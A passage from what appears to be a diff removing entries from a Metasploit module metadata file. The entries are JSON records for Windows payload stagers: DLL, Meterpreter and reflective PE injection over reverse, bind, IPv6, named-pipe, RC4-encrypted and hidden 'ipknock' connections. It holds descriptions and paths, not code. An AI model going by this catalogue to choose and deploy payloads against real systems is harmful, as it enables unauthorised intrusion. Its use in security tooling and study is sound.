"stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/patchupdllinject/reverse_tcp_rc4_dns": { - "name": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/patchupdllinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/patchupdllinject/reverse_tcp_uuid": { - "name": "Windows Inject DLL, Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/patchupdllinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_tcp_uuid", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/patchupmeterpreter/bind_hidden_ipknock_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/patchupmeterpreter/bind_hidden_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager", - "fullname": "payload/windows/patchupmeterpreter/bind_hidden_tcp", - "aliases": [], - "rank": 300, - 
"disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/patchupmeterpreter/bind_ipv6_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/patchupmeterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - 
"stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/patchupmeterpreter/bind_ipv6_tcp_uuid": { - "name": "Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/patchupmeterpreter/bind_named_pipe": { - "name": "Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/patchupmeterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "UserExistsError" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - 
"is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/patchupmeterpreter/bind_nonx_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/patchupmeterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "vlad902 " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/patchupmeterpreter/bind_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/patchupmeterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": 
null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/patchupmeterpreter/bind_tcp_rc4": { - "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/patchupmeterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/patchupmeterpreter/bind_tcp_uuid": { - "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/patchupmeterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL 
(staged).\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/patchupmeterpreter/find_tag": { - "name": "Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager", - "fullname": "payload/windows/patchupmeterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/patchupmeterpreter/reverse_ipv6_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/patchupmeterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": 
"payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/patchupmeterpreter/reverse_nonx_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/patchupmeterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "vlad902 " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/patchupmeterpreter/reverse_ord_tcp": { - "name": "Windows Meterpreter (skape/jt 
Injection), Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/patchupmeterpreter/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "spoonm " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/patchupmeterpreter/reverse_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager", - "fullname": "payload/windows/patchupmeterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": 
"windows/reverse_tcp" - }, - "payload_windows/patchupmeterpreter/reverse_tcp_allports": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager", - "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/patchupmeterpreter/reverse_tcp_dns": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)", - "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "RageLtMan" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_tcp_dns", - "check": false, 
- "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/patchupmeterpreter/reverse_tcp_rc4": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/patchupmeterpreter/reverse_tcp_rc4_dns": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/patchupmeterpreter/reverse_tcp_uuid": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/peinject/bind_hidden_ipknock_tcp": { - "name": "Windows Inject PE Files, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/peinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - 
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\n\n Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode", - "references": [ - "URL-https://github.com/EgeBalci/Amber", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/peinject/bind_hidden_tcp": { - "name": "Windows Inject PE Files, Hidden Bind TCP Stager", - "fullname": "payload/windows/peinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Inject a custom native PE file into the 
exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/EgeBalci/Amber", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/peinject/bind_ipv6_tcp": { - "name": "Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. 
PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/peinject/bind_ipv6_tcp_uuid": { - "name": "Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/peinject/bind_named_pipe": { - "name": "Windows Inject PE Files, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "UserExistsError" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/peinject/bind_nonx_tcp": { - "name": "Windows Inject PE Files, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/peinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "vlad902 " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
